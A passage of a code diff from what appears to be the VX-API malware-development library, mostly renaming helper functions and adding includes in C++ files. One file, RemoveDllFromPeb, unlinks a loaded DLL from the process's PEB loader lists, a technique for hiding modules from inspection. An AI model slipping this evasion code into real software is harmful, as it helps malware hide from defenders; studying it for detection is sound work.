 			goto EXIT_ROUTINE;
 	}
 
-	PathCombineA = (PATHCOMBINEA)RfGetProcAddressA((DWORD64)hShlwapi, "PathCombineW");
+	PathCombineA = (PATHCOMBINEA)GetProcAddressA((DWORD64)hShlwapi, "PathCombineW");
 	if (PathCombineA == NULL)
 		goto EXIT_ROUTINE;
 
@@ -121,7 +123,7 @@ BOOL UnusedSubroutineRecursiveFindFileMainW(LPCWSTR Path, LPCWSTR Pattern, PVOID
 	typedef LPWSTR(WINAPI* PATHCOMBINEW)(LPCWSTR, LPCWSTR, LPCWSTR);
 	PATHCOMBINEW PathCombineW = (PATHCOMBINEW)pfnPathCombineW;
 
-	HANDLE HeapHandle = RfGetProcessHeap();
+	HANDLE HeapHandle = GetProcessHeapEx();
 	WCHAR szFullPattern[MAX_PATH] = { 0 };
 	WIN32_FIND_DATAW FindData = { 0 };
 	HANDLE FindHandle = INVALID_HANDLE_VALUE;
@@ -143,7 +145,7 @@ BOOL UnusedSubroutineRecursiveFindFileMainW(LPCWSTR Path, LPCWSTR Pattern, PVOID
 			if (FindData.cFileName[0] == '$')
 				continue;
 
-			RfZeroMemory(szFullPattern, MAX_PATH);
+			ZeroMemoryEx(szFullPattern, MAX_PATH);
 			if (PathCombineW(szFullPattern, Path, FindData.cFileName) == NULL)
 				goto EXIT_ROUTINE;
 
@@ -164,7 +166,7 @@ BOOL UnusedSubroutineRecursiveFindFileMainW(LPCWSTR Path, LPCWSTR Pattern, PVOID
 
 	do
 	{
-		RfZeroMemory(szFullPattern, MAX_PATH);
+		ZeroMemoryEx(szFullPattern, MAX_PATH);
 		if (!(FindData.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY))
 		{
 			if (PathCombineW(szFullPattern, Path, FindData.cFileName) == NULL)
@@ -200,7 +202,7 @@ BOOL RecursiveFindFileW(LPCWSTR Path, LPCWSTR Pattern)
 	BOOL bIsNewlyLoaded = FALSE;
 	BOOL bFlag = FALSE;
 
-	hShlwapi = RfGetModuleHandleW(L"Shlwapi.dll");
+	hShlwapi = GetModuleHandleExW(L"Shlwapi.dll");
 	if (hShlwapi == NULL)
 	{
 		bIsNewlyLoaded = TRUE;
@@ -209,7 +211,7 @@ BOOL RecursiveFindFileW(LPCWSTR Path, LPCWSTR Pattern)
 			goto EXIT_ROUTINE;
 	}
 
-	PathCombineW = (PATHCOMBINEW)RfGetProcAddressA((DWORD64)hShlwapi, "PathCombineW");
+	PathCombineW = (PATHCOMBINEW)GetProcAddressA((DWORD64)hShlwapi, "PathCombineW");
 	if (PathCombineW == NULL)
 		goto EXIT_ROUTINE;
 
@@ -221,4 +223,4 @@ EXIT_ROUTINE:
 		FreeLibrary(hShlwapi);
 
 	return bFlag;
-}
+}

VX-API/RemoveDllFromPeb.cpp

@@ -1,4 +1,6 @@
-void RfRemoveEntryList(LIST_ENTRY* Entry)
+#include "Win32Helper.h"
+
+VOID RemoveEntryList(LIST_ENTRY* Entry)
 {
 	if (Entry != NULL) {
 		PLIST_ENTRY OldFlink;
@@ -12,7 +14,7 @@ void RfRemoveEntryList(LIST_ENTRY* Entry)
 	}
 }
 
-BOOL RfRemoveDllFromPebW(LPCWSTR lpModuleName) {
+BOOL RemoveDllFromPebW(LPCWSTR lpModuleName) {
 	PPEB Peb = GetPeb();
 	PLDR_MODULE Module = NULL;
 
@@ -31,19 +33,17 @@ BOOL RfRemoveDllFromPebW(LPCWSTR lpModuleName) {
 				RemoveEntryList(&Module->InInitializationOrderModuleList);
 				RemoveEntryList(&Module->InMemoryOrderModuleList);
 				RemoveEntryList(&Module->HashTableEntry);
-				
+
 				return TRUE;
 			}
-				
 		}
-
 		Next = Next->Flink;
 	}
 
 	return FALSE;
 }
 
-BOOL RfRemoveDllFromPebA(LPCSTR lpModuleName) {
+BOOL RemoveDllFromPebA(LPCSTR lpModuleName) {
 	PPEB Peb = GetPeb();
 	PLDR_MODULE Module = NULL;
 	CHAR wDllName[64] = { 0 };
@@ -56,11 +56,10 @@ BOOL RfRemoveDllFromPebA(LPCSTR lpModuleName) {
 		Module = (PLDR_MODULE)((PBYTE)Next - 16);
 		if (Module->BaseDllName.Buffer != NULL)
 		{
-			RfZeroMemory(wDllName, sizeof(wDllName));
+			ZeroMemoryEx(wDllName, sizeof(wDllName));
 			WCharStringToCharString(wDllName, Module->BaseDllName.Buffer, 64);
-			if (StringCompareA(lpModuleName, Module->BaseDllName.Buffer) == 0)
+			if (StringCompareA(lpModuleName, wDllName) == 0)
 			{
-
 				RemoveEntryList(&Module->InLoadOrderModuleList);
 				RemoveEntryList(&Module->InInitializationOrderModuleList);
 				RemoveEntryList(&Module->InMemoryOrderModuleList);
@@ -68,11 +67,9 @@ BOOL RfRemoveDllFromPebA(LPCSTR lpModuleName) {
 
 				return TRUE;
 			}
-
 		}
-
 		Next = Next->Flink;
 	}
 
 	return FALSE;
-}
+}

VX-API/RtlInitEmptyUnicodeString.cpp

@@ -1,3 +1,5 @@
+#include "StringManipulation.h"
+
 VOID RtlInitEmptyUnicodeString(PUNICODE_STRING UnicodeString, PWCHAR Buffer, USHORT BufferSize)
 {
 	UnicodeString->Length = 0;
@@ -5,4 +7,4 @@ VOID RtlInitEmptyUnicodeString(PUNICODE_STRING UnicodeString, PWCHAR Buffer, USH
 	UnicodeString->Buffer = Buffer;
 
 	return;
-}
+}

VX-API/RtlInitUnicodeString.cpp

@@ -1,3 +1,5 @@
+#include "StringManipulation.h"
+
 VOID RtlInitUnicodeString(PUNICODE_STRING DestinationString, PCWSTR SourceString)
 {
 	SIZE_T DestSize;
@@ -15,4 +17,4 @@ VOID RtlInitUnicodeString(PUNICODE_STRING DestinationString, PCWSTR SourceString
 	}
 
 	DestinationString->Buffer = (PWCHAR)SourceString;
-}
+}

VX-API/RtlLoadPeHeaders.cpp

@@ -1,3 +1,5 @@
+#include "Win32Helper.h"
+
 BOOL RtlLoadPeHeaders(PIMAGE_DOS_HEADER* Dos, PIMAGE_NT_HEADERS* Nt, PIMAGE_FILE_HEADER* File, PIMAGE_OPTIONAL_HEADER* Optional, PBYTE* ImageBase)
 {
 	*Dos = (PIMAGE_DOS_HEADER)*ImageBase;
@@ -12,4 +14,4 @@ BOOL RtlLoadPeHeaders(PIMAGE_DOS_HEADER* Dos, PIMAGE_NT_HEADERS* Nt, PIMAGE_FILE
 	*Optional = (PIMAGE_OPTIONAL_HEADER)((PBYTE)*File + sizeof(IMAGE_FILE_HEADER));
 
 	return TRUE;
-}
+}

VX-API/SecureStringCopy.cpp

@@ -1,3 +1,5 @@
+#include "StringManipulation.h"
+
 PCHAR SecureStringCopyA(PCHAR String1, LPCSTR String2, SIZE_T Size)
 {
 	PCHAR pChar = String1;
@@ -14,4 +16,4 @@ PWCHAR SecureStringCopyW(PWCHAR String1, LPCWSTR String2, SIZE_T Size)
 	while (Size-- && (*String1++ = *String2++) != '\0');
 
 	return pChar;
-}
+}